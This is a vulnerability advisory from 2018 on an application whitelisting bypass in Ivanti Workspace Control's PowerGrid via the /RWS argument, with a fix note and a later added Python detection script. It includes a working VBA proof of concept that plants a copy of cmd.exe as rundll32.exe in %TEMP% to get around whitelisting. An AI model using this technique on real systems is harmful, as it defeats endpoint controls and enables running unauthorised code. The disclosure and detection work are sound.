------------------------------------------------------------------------
Ivanti Workspace Control Application Whitelist bypass via PowerGrid /RWS
command line argument
------------------------------------------------------------------------
Yorick Koster, August 2018

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was found that the PowerGrid application will execute rundll32.exe
from a relative path when it is started with the /RWS command line
option. An attacker can abuse this issue to bypass Application
Whitelisting in order to run arbitrary code on the target machine.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on Ivanti Workspace Control version
10.2.700.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue was resolved in Ivanti Workspace Control version 10.2.950.0.
PowerGrid now uses the GetSystemDirectory() function to construct an
absolute path to rundll32.exe.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20180801/ivanti-workspace-control-application-whitelist-bypass-via-powergrid-_rws-command-line-argument.html

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The VBA code below demonstrates this issue. The code tries to run
cmd.exe from the %TEMP% folder.

Private Sub PowerGridAWLBypass()
    On Error Resume Next
    Dim tmpPath, resPath, targetPath
    tmpPath = Environ("TEMP")
    resPath = Environ("RESPFDIR")
    targetPath = Environ("SystemRoot") & "\System32\cmd.exe"

    ' Place a copy of cmd.exe in %TEMP% under the name rundll32.exe
    ' and make %TEMP% the current directory
    FileCopy targetPath, tmpPath & "\rundll32.exe"
    ChDir tmpPath

    ' Create the file that is passed to the /RWS option
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim oFile As Object
    Set oFile = fso.CreateTextFile(tmpPath & "\foo.xml")
    oFile.WriteLine ""
    oFile.Close
    Set fso = Nothing
    Set oFile = Nothing

    ' Start PowerGrid with /RWS; it resolves rundll32.exe relative to the
    ' current directory
    Shell resPath & "\pwrgrid.exe /RWS foo.xml", vbNormalFocus
End Sub
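
Added example (not part of the original advisory and not Ivanti's code): a detection check for the behaviour described above, flagging process-creation events in which pwrgrid.exe starts a rundll32.exe image located outside the Windows system directories. Field names follow Sysmon-style process-creation records; the sample events, the pwrgrid.exe install path and the C:\Windows system root are constructed assumptions.

```python
import ntpath

# Assumption: default system root C:\Windows. A genuine rundll32.exe lives here.
SYSTEM_DIRS = {
    ntpath.normcase(r"C:\Windows\System32"),
    ntpath.normcase(r"C:\Windows\SysWOW64"),
}

def is_trusted_rundll32(image):
    """True only if image is rundll32.exe inside a system directory."""
    path = ntpath.normcase(ntpath.normpath(image))  # resolves '..', folds case
    return (ntpath.basename(path) == "rundll32.exe"
            and ntpath.dirname(path) in SYSTEM_DIRS)

def find_suspect_launches(events):
    """Return events where pwrgrid.exe spawned a non-system rundll32.exe."""
    hits = []
    for ev in events:
        parent = ntpath.basename(ntpath.normcase(ev["ParentImage"]))
        child = ntpath.basename(ntpath.normcase(ev["Image"]))
        if parent != "pwrgrid.exe" or child != "rundll32.exe":
            continue
        if not is_trusted_rundll32(ev["Image"]):
            # Record whether the parent was started with /RWS, for triage.
            rws = "/rws" in ev.get("ParentCommandLine", "").lower()
            hits.append({**ev, "ParentUsedRWS": rws})
    return hits

# Constructed sample events; C:\RESPFDIR-placeholder stands in for %RESPFDIR%.
PWRGRID = r"C:\RESPFDIR-placeholder\pwrgrid.exe"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": PWRGRID,
     "ParentCommandLine": PWRGRID + " /RWS settings.xml"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\rundll32.exe",
     "ParentImage": PWRGRID,
     "ParentCommandLine": PWRGRID + " /RWS foo.xml"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for hit in find_suspect_launches(SAMPLE_EVENTS):
        print("suspect:", hit["Image"], "RWS parent:", hit["ParentUsedRWS"])
```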